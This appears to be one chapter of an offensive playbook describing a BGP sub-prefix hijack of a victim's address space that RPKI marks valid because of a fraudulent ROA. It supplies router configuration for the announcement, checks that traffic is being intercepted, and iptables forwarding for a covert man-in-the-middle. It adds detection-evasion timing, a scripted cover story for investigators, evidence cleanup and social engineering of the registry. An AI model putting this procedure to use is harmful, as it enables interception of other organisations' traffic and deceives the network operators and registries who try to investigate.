Playbook 3: Prefix hijacking with RPKI validation cover¶
Why this is different from normal hijacking¶
This is the payoff for phases 1-2. We’re now executing what appears to be a standard sub-prefix hijack (node 1.1.1 from the BGP hijacking tree), but with a critical difference:
When validators check our announcement, they will return VALID.
This is the essence of a control-plane attack. We’re not bypassing validation. We’re not exploiting the absence of validation. We’ve corrupted the validation system itself so that it endorses our attack.
From the purple page distinction:
Data-plane hijack: “I claim to originate this prefix” (forged letter, might be caught by validation)
Control-plane poisoning: “The Registry says I’m authorised” (edited the ledger, validation confirms our claim)
Defenders who check RPKI validation status will see our hijack marked VALID. Their security tools designed to catch hijacks via RPKI will not alert. We’re operating with the Guild Registry’s blessing, because we’ve edited the Registry.
Attack tree path¶
Primary: 1 → 1.1 “Prefix hijacking” → 1.1.1 “Sub-prefix hijacking” → 1.1.1.1 “Announcing a more specific prefix than the legitimate one”
Supporting: 1.3.3.1 “Long-term hijacking for espionage” - this hijack can persist because validation marks it as legitimate
Evasion: 1.6.1.3 “Mimicking legitimate announcements” - our announcement appears legitimate because RPKI says it is
Phase 3 Actions¶
Action 3.1: Announce target sub-prefix¶
Intent Announce 203.0.113.128/25 (more-specific within victim’s /24) from our AS64513, exploiting longest-prefix-match routing to intercept traffic destined for 203.0.113.128-255, whilst maintaining RPKI VALID status due to fraudulent ROA created in phase 2.
Preconditions
Phase 2 complete: fraudulent ROA published for 48+ hours without revocation
Validation deployment mapped: identified target region with <50% validation enforcement
Monitoring active: confirms fraudulent ROA still present
We have BGP peering session in target region
Cover story prepared for “why are we announcing this prefix”
Execution method
From router with eBGP session to peer in target region (APAC selected based on phase 2 mapping):
router bgp 64513
address-family ipv4 unicast
network 203.0.113.128/25
! Add community tags to appear legitimate
route-map SET_COMMUNITIES permit 10
set community 64513:100 # Standard traffic engineering community
set origin igp # Internal origin (appears more legitimate than incomplete)
Apply configuration:
vtysh -c "clear ip bgp * soft out"
Wait for announcement propagation (30-180 seconds typical).
Expected technical effect
Within 5 minutes of announcement:
Routing impact:
Routers applying longest-prefix-match will prefer our /25 over victim’s /24 for addresses 203.0.113.128-255
Traffic from target region destined for 203.0.113.150 (within our /25) routes via AS64513
Traffic destined for 203.0.113.10 (outside our /25) continues routing via AS65001
Split routing achieved: we intercept subset of victim’s traffic
RPKI validation result (CRITICAL):
Validators check our announcement against ROAs
Our fraudulent ROA (created in phase 2) authorises AS64513 for 203.0.113.0/24 with maxLength /25
Validation returns: VALID ✓
Networks enforcing RPKI validation will accept and propagate our announcement because validators say it’s legitimate
This is the control-plane attack succeeding. We’re not evading validation. Validation is endorsing us.
Comparison to data-plane hijack:
Without our fraudulent ROA: announcement would be marked INVALID, dropped by validating networks
With our fraudulent ROA: announcement marked VALID, accepted by all networks (validating and non-validating)
Expected observational footprint
BGP announcement footprint (MEDIUM VISIBILITY):
BGP UPDATE message visible in peer logs, route reflectors, public collectors
More-specific prefix within known allocation may trigger alerts (IF monitoring exists for this)
RPKI validation check will return VALID (appears legitimate, reduces alert priority)
NetFlow impact (HIGH VISIBILITY if monitored):
Traffic volume to 203.0.113.128-255 shifts from AS65001 path to AS64513 path
Victim organisation monitoring their traffic will see volume drop
This is most visible indicator of hijack, but requires active NetFlow monitoring
Detection by public monitors (MEDIUM):
BGPmon, RIPE RIS, Cloudflare Radar will see new more-specific announcement
Public monitors will check RPKI status
Status returned: VALID (makes hijack appear less suspicious)
Manual investigation required to notice: “wait, why is AS64513 announcing AS65001’s space?”
Detection likelihood:
Automated RPKI-based detection: Low (our announcement validates as VALID)
Traffic volume monitoring: High (if victim monitors NetFlow)
Manual BGP monitoring: Medium (requires human noticing unexpected AS announcing victim’s space)
Peer notification: Low (peers see VALID announcement, less likely to question)
Manual steps
Before announcement:
Verify fraudulent ROA still present (check monitoring from Action 2.3)
Confirm peer session is stable (don’t announce during session flapping)
Have abort procedure ready (withdrawal configuration prepared)
Verify time is during business hours target region (appears routine, easier to social-engineer if questioned)
After announcement:
Monitor BGP session stability (announcement may cause peer to drop session if they have undocumented filters)
Verify announcement propagated (check public route servers, looking glasses)
Confirm RPKI validation returns VALID (query multiple validators)
Monitor for revocation of fraudulent ROA (if revoked, our announcement becomes INVALID immediately)
Timing uncertainty
Announcement propagation: 30-180 seconds typical, but can vary:
Immediate: well-connected peers, stable sessions
5-10 minutes: route reflectors with pacing timers
Never: if peer has unexpected prefix filter we didn’t detect in reconnaissance
RPKI validation check timing:
Routers poll validators at 30-60 minute intervals typically
Routers that already cached “no ROA” result might take hours to recheck
Routers that haven’t polled since our fraudulent ROA was created will see VALID immediately
Traffic shift timing:
Existing TCP connections continue on old path until timeout
New connections follow new path immediately
Full traffic shift: 5-30 minutes depending on connection duration patterns
Budget reality check
This announcement will succeed in regions where:
Peers don’t have comprehensive prefix filters (common)
RPKI validation is not deployed or not enforced (40% of networks globally)
More-specific announcements are not specifically monitored (most networks)
It will partially succeed in regions where:
Some peers validate (traffic splits between validating and non-validating peers)
Monitoring exists but alerting thresholds not tuned for /25 announcements
Manual investigation required, which takes time (giving us operational window)
Action 3.2: Verify traffic interception¶
Intent Confirm that traffic destined for 203.0.113.128-255 is actually routing via our AS64513, not just that our announcement propagated.
Preconditions
Action 3.1 complete: announcement has propagated (5+ minutes elapsed)
We have visibility into traffic arriving at our AS64513 infrastructure
Test endpoints available in target region to generate traffic
Execution method
From test endpoint in target region (APAC):
# Send traffic to address within our hijacked /25
traceroute 203.0.113.150
# Expected: path should show our AS64513
# If path shows AS65001, hijack has not succeeded in this region
# Verify with multiple test points
for ip in 198.51.100.10 198.51.100.20 203.0.0.50; do
echo "Testing from $ip"
traceroute -s $ip 203.0.113.150
done
Monitor traffic arriving at our AS64513 border routers:
# Check for traffic to hijacked prefix
tcpdump -i eth0 -n 'dst net 203.0.113.128/25'
# Should see packets arriving from upstream peers
# If no packets seen within 10 minutes, hijack not effective
Expected technical effect
Within 10 minutes of Action 3.1:
Traffic interception confirmed:
Test traceroutes show path via AS64513
tcpdump shows packets arriving for 203.0.113.128-255
Traffic volume correlates with expected patterns for this address space
Success indicators:
100% of test endpoints route via our AS: complete hijack success in target region
50-80% of test endpoints route via our AS: partial success (mixed validation deployment)
0-20% of test endpoints route via our AS: hijack mostly failed (higher validation enforcement than phase 2 detected)
Expected observational footprint
Traffic testing footprint:
Traceroute packets visible in transit (COMMON, not suspicious by itself)
Multiple traceroutes from same sources might appear like troubleshooting (PLAUSIBLE)
tcpdump on border interface is internal-only, no external footprint
If traffic is actually reaching our AS:
Destination 203.0.113.150 will see connection attempts from unexpected source IPs (our test endpoints)
If destination is a monitored service, security team may investigate “unusual connection patterns”
This footprint only exists if we actually send application-layer traffic, not just ICMP/traceroute
Detection likelihood: Low to Medium. Traceroutes appear like routine troubleshooting. Only suspicious if correlated with BGP announcement timing.
Manual steps
Verify test endpoints are geographically distributed across target region (single test point might be anomalous)
Document which peers are routing traffic to us (identifies non-validating peers)
Document which peers are NOT routing to us (identifies validating peers, useful for future operations)
If hijack partially successful, calculate percentage of traffic intercepted
Timing uncertainty
Traffic shift can take 5-30 minutes due to:
Existing TCP connections continuing on old path
Route propagation delays between peers
Some routers slower to recompute best paths
If no traffic seen within 30 minutes, hijack has likely failed or is only effective in very limited scope.
Action 3.3: Establish forwarding to maintain service¶
Intent Forward intercepted traffic to legitimate destination (AS65001) to avoid causing obvious outage, implementing “polite hijack with interception” pattern that reduces detection likelihood whilst maintaining traffic visibility.
Preconditions
Action 3.2 complete: traffic interception confirmed
We have established IP connectivity to reach victim’s actual servers at 203.0.113.128-255
Forwarding infrastructure configured and tested
Execution method
Configure policy-based routing to forward traffic after inspection:
# On border router receiving hijacked traffic
ip route 203.0.113.128/25 198.51.100.1 # Route to our inspection device
# On inspection device
iptables -t nat -A PREROUTING -d 203.0.113.128/25 -j DNAT --to-destination 203.0.113.128-255
iptables -t nat -A POSTROUTING -s <our_network> -j SNAT --to-source <our_exit_IP>
# Enable IP forwarding
sysctl -w net.ipv4.ip_forward=1
This configuration:
Receives traffic from our BGP announcement
Optionally inspects/logs traffic
Forwards traffic to victim’s actual infrastructure
Appears to users like normal service (minimal disruption)
Expected technical effect
Traffic flow after forwarding:
User → AS64513 (our AS) → inspection → AS65001 (victim) → response → AS64513 → User
Service impact:
Users experience additional latency (1-5ms typically for single hop)
Services remain functional (forwarding maintains reachability)
Connection quality slightly degraded (extra hop increases packet loss probability)
Most users will not notice (small latency increase within normal variance)
Detection impact:
No obvious service outage (reduces victim awareness)
Traffic continues functioning (no user complaints to investigate)
Victim sees traffic arriving from our exit IPs instead of original sources (SUSPICIOUS if examined)
This implements “polite hijacking” from node 1.5.1.1 “Man-in-the-middle attacks” in the hijacking tree. We’re intercepting, not disrupting.
Expected observational footprint
Forwarding footprint (HIGH RISK if examined):
Victim’s servers see connections from our exit IPs, not from original client IPs (ANOMALOUS)
Reverse DNS lookups on our exit IPs will show they’re in AS64513 (SUSPICIOUS)
If victim has NetFlow monitoring showing “traffic now arriving from AS64513 instead of usual sources”: DETECTABLE
HTTP headers, TLS SNI, or application logs may show our intermediary hop (depending on protocol)
This is the highest-risk phase for technical detection. If victim has comprehensive traffic analysis, they will notice:
Source IPs changed
TTL values decreased (extra hop visible)
Latency patterns changed
Traffic now comes from AS64513 instead of expected peers
Detection likelihood: High if victim has detailed traffic monitoring. Low if victim only monitors for outages.
Manual steps
Verify forwarding works before committing (test with single connection first)
Monitor for connection failures (forwarding may break some protocols if not configured correctly)
Watch for victim detection indicators (sudden increase in abuse complaints, peering session changes, etc.)
Document traffic patterns for operational security (which services are most used, when, from where)
Timing uncertainty
Forwarding configuration: instant Traffic flow establishment: 30-60 seconds (TCP connections need to establish through new path) Service stability: monitor for 2-4 hours to ensure no unexpected protocol breaks
Some protocols may break:
Path MTU discovery issues (extra hop may cause fragmentation)
Protocols with embedded IP addresses (FTP, SIP, etc.)
TLS certificate validation if our forwarding is not transparent
Budget reality check
Forwarding maintains service, which reduces detection. Most organisations primarily monitor for outages, not for traffic path changes. As long as services remain available, investigation priority is low.
However, sophisticated organisations with NetFlow analysis and traffic baselining will detect this quickly (within hours). The forwarding buys time, not invisibility.
Action 3.4: Monitoring and operational security during hijack¶
Intent Maintain continuous monitoring of hijack effectiveness, ROA status, and detection indicators whilst hijack is active, providing early warning to execute abort procedure if compromise detected.
Preconditions
Action 3.3 complete: hijack active, forwarding established
Monitoring from phase 2 (Action 2.3) still running
Alert mechanisms configured
Execution method
Deploy comprehensive monitoring dashboard tracking:
ROA status monitoring (from phase 2, continue running):
# Same script from Action 2.3, but now CRITICAL
# If fraudulent ROA is revoked, hijack becomes INVALID immediately
BGP announcement status:
# Check our announcement remains visible
for lg in route-views.oregon-ix.net route-server.ip.telia.net; do
echo "Checking $lg"
ssh $lg "show ip bgp 203.0.113.128/25"
done
Traffic volume monitoring:
# Monitor intercepted traffic volume
iftop -i eth0 -f "dst net 203.0.113.128/25" -t -s 10
Detection indicators:
Check our AS64513 border for unexpected BGP session resets (peers dropping us)
Monitor abuse@ email for complaints
Watch public BGP forums/lists for mentions of 203.0.113.0/24
Check BGPmon, Cloudflare Radar for “this announcement is suspicious” flags
Expected technical effect
Monitoring provides:
Real-time confirmation hijack remains active
Early warning if fraudulent ROA is revoked (abort trigger)
Detection of victim countermeasures (new ROAs, filtered announcements, etc.)
Operational awareness of hijack impact (traffic volume, service impact)
Alert triggers for IMMEDIATE ABORT:
Fraudulent ROA disappears from validators
Our BGP announcement rejected by multiple peers simultaneously
Abuse complaints received
Public BGP monitoring services flag our announcement as suspicious
Expected observational footprint
Monitoring activities:
SSH to public looking glasses (COMMON, thousands of networks do this)
Traffic volume monitoring internal-only (no external footprint)
Email monitoring internal-only (no external footprint)
No additional footprint beyond hijack itself.
Manual steps
Designate person responsible for monitoring 24/7 during hijack (cannot be unattended)
Document abort procedure (one-command withdrawal of announcement)
Set up escalation: if monitoring person detects abort trigger, who do they notify?
Prepare cover story for if we’re contacted (see below)
Timing uncertainty
Monitoring is continuous. No timing uncertainty, but human factors:
Monitoring fatigue (person watching dashboard for hours)
Alert fatigue (false positives from monitoring tools)
Response time lag (how quickly can we execute abort if needed)
Budget 15-30 second response time from detection to abort execution in worst case.
Action 3.5: Controlled withdrawal¶
Intent Withdraw hijack announcement in controlled manner that minimizes attribution and preserves operational security for future operations, appearing like routine network maintenance rather than detected attack.
Preconditions
Hijack has achieved operational objective (traffic intercepted for required duration)
OR abort trigger detected (fraudulent ROA revoked, detection indicators observed)
Withdrawal timing selected (business hours preferred, appears like maintenance)
Execution method
Graceful withdrawal sequence:
router bgp 64513
address-family ipv4 unicast
no network 203.0.113.128/25
Apply withdrawal:
vtysh -c "clear ip bgp * soft out"
Wait 5 minutes, then verify withdrawal propagated:
# Should show no announcement
routinator vrps --output json | jq '.roas[] | select(.prefix == "203.0.113.128/25")'
Withdrawal timing strategy:
Best case: withdraw during scheduled maintenance window announced in advance
Send email to peers 24 hours before: “Scheduled maintenance, expect routing changes”
Withdraw during announced window
Appears completely legitimate
Abort case: withdraw immediately when detection occurs
No advance notice possible
Execute withdrawal as fast as possible
Prepare cover story: “Emergency maintenance due to configuration error”
Expected technical effect
Within 5 minutes of withdrawal:
Our announcement disappears from BGP tables
Traffic returns to routing via AS65001 (legitimate path)
Service impact: potential brief disruption as routes reconverge (30-60 seconds)
RPKI validation status: no longer relevant (no announcement to validate)
Post-withdrawal state:
Fraudulent ROA still exists (if not revoked)
Can be used for future operations
If ROA is discovered later, we have deniability: “We never actually announced that prefix, ROA was created in error”
Expected observational footprint
Withdrawal footprint:
BGP WITHDRAW message visible (EXPECTED, normal network operations)
If timed with maintenance announcement: appears completely legitimate
If sudden abort: appears like emergency fix, but plausible
Post-withdrawal investigation risk:
Victim may analyze historical BGP data and discover our announcement existed
Timeline correlation: fraudulent ROA creation → announcement → withdrawal (SUSPICIOUS)
If investigation reaches this depth: cover story needed
Cover story for post-investigation: “Our operations team was testing RPKI deployment and mistakenly created ROA for incorrect prefix due to spreadsheet error. When we discovered the error, we immediately withdrew any announcements and corrected the ROA. We apologize for any confusion this caused.”
This cover story is plausible because RPKI is complex and these errors genuinely happen.
Manual steps
Verify withdrawal command syntax before execution (fat-finger during abort is catastrophic)
Confirm withdrawal propagated (check multiple looking glasses)
Monitor for service restoration at victim (indicates traffic routing normally)
Document withdrawal timestamp for audit trail
Decide whether to revoke fraudulent ROA or leave it (leaving it enables future operations, but increases long-term attribution risk)
Timing uncertainty
Withdrawal propagation: 30-180 seconds (same as announcement, but usually faster) Service reconvergence: 30-90 seconds (victim’s routes become preferred again)
If abort triggered, execute within 60 seconds of detection.
Budget reality check
Most hijacks are detected during announcement or during active phase, not during withdrawal. Clean withdrawal often goes unnoticed because victim organization is focused on “service is restored, crisis over” rather than forensic analysis of what happened.
Leaving fraudulent ROA in place is risky but enables future operations. Revoking it provides clean break but requires RIR account access (which may be lost if credentials were changed after detection).
Recording the mess honestly¶
The forwarding problem¶
Action 3.3 (forwarding) is technically complex and protocol-dependent:
HTTP/HTTPS: mostly works, but TLS certificate validation may fail if our forwarding terminates connections
DNS: works but our responses come from wrong source IP (detectable)
SMTP: works but creates bounce loops if victim has strict SPF
Protocols with embedded IPs (FTP, SIP, H.323): often break entirely
Gaming protocols, VoIP, video streaming: high packet loss sensitivity, noticeable quality degradation
Testing forwarding comprehensively is its own operation. This playbook assumes simple TCP forwarding. Real-world implementation requires protocol-specific handling.
The detection timing gamble¶
Phase 3 success depends on victim NOT having:
Real-time BGP monitoring with alerting
NetFlow analysis showing source AS changes
RPKI audit trails showing fraudulent ROA creation
Automated anomaly detection on traffic patterns
If victim has any of these, detection timing is:
BGP monitoring: 5-30 minutes (depends on check interval)
NetFlow analysis: 1-4 hours (depends on analysis frequency)
RPKI audit: days to weeks (requires manual review, rarely done)
Anomaly detection: 10-60 minutes (depends on baseline and alerting sensitivity)
We’re gambling that victim doesn’t have comprehensive monitoring. ~60% of networks don’t. But the 40% that do will detect quickly.
The persistence versus attribution trade-off¶
Longer hijack duration = more operational value but higher detection risk and stronger attribution evidence
Short hijack (5-10 minutes):
Pros: low detection likelihood, appears like transient issue
Cons: limited operational value, may not accomplish objective
Medium hijack (1-4 hours):
Pros: reasonable operational window, still plausibly “testing gone wrong”
Cons: detected by automated systems if they exist
Long hijack (days/weeks):
Pros: maximum operational value, sustained access
Cons: inevitable detection, forensic timeline clearly shows deliberate action
Node 1.3.3.1 “Long-term hijacking for espionage” from the hijacking tree requires accepting high attribution risk. Most operations should target medium duration.
Where best practice lost to budget reality¶
Best practice says: organisations should have real-time BGP monitoring, NetFlow analysis, RPKI audit logging, traffic baselining, and automated anomaly detection.
Budget reality says: most organisations have subset of these, and monitoring that exists is often tuned to avoid alert fatigue, meaning slow detection response.
The gap is substantial:
<20% of networks have real-time BGP monitoring with alerting
<40% have NetFlow collection, fewer analyze it regularly
<10% have RPKI audit trails, fewer review them
<5% have automated traffic anomaly detection
Phase 3 succeeds most often against the 60-80% of networks with partial or absent monitoring.
Success criteria for phase 3¶
Phase 3 succeeds when:
Traffic interception confirmed (Action 3.2 verified)
Interception sustained for required duration (operational objective achieved)
Withdrawal completed cleanly (no detection during withdrawal)
RPKI validation marked our hijack as VALID throughout (control-plane attack confirmed)
Phase 3 partially succeeds when:
Traffic intercepted from some regions but not others (validation deployment inconsistent)
Detection occurred but operational objective achieved before abort
Hijack worked but forwarding broke some protocols (partial service disruption)
Phase 3 fails when:
No traffic intercepted (hijack announcement not propagated or preferred)
Immediate detection and countermeasures (fraudulent ROA revoked within minutes)
Service outage caused customer complaints leading to rapid investigation
Control-plane attack assessment¶
This three-phase operation is a true control-plane attack because:
We manipulated RPKI ROAs (the authoritative control-plane state)
Validators endorsed our hijack as VALID (corrupted truth, not bypassed checks)
Defensive systems designed to prevent hijacks via RPKI failed to detect because we corrupted their source of truth
From the control-plane vs data-plane distinction:
This was not forging letters (data-plane). This was editing the Guild Registry (control-plane).
Networks that implemented RPKI validation as defense mechanism were compromised by the very system meant to protect them. Their validators returned VALID because we poisoned the validation infrastructure.
That is the essence of control-plane attack: not bypassing security, but corrupting the foundations security depends on.
Post-operation cleanup¶
After withdrawal, the attack chain leaves evidence:
Persistent artifacts:
Fraudulent ROA (may still exist in RPKI repositories)
BGP historical data (announcement visible in route collectors)
NetFlow historical data (traffic path change visible)
Audit logs (RIR ROA creation, modification timestamps)
Cleanup options:
Option A: Revoke fraudulent ROA
Removes primary evidence
Requires RIR account access (may be lost)
Creates audit trail of revocation (timestamped, visible)
Option B: Leave fraudulent ROA
Maintains capability for future operations
Increases long-term attribution risk
If discovered months later, harder to claim “mistake”
Option C: Social engineering ROA removal
Contact RIR claiming “error”, request removal
Plausible if done quickly after attack
Creates human interaction trail (phone calls, emails)
Recommended: Option A if accessible, Option C if not.
Do NOT leave fraudulent ROA indefinitely. Long-term presence is strongest evidence of deliberate control-plane attack versus operational error.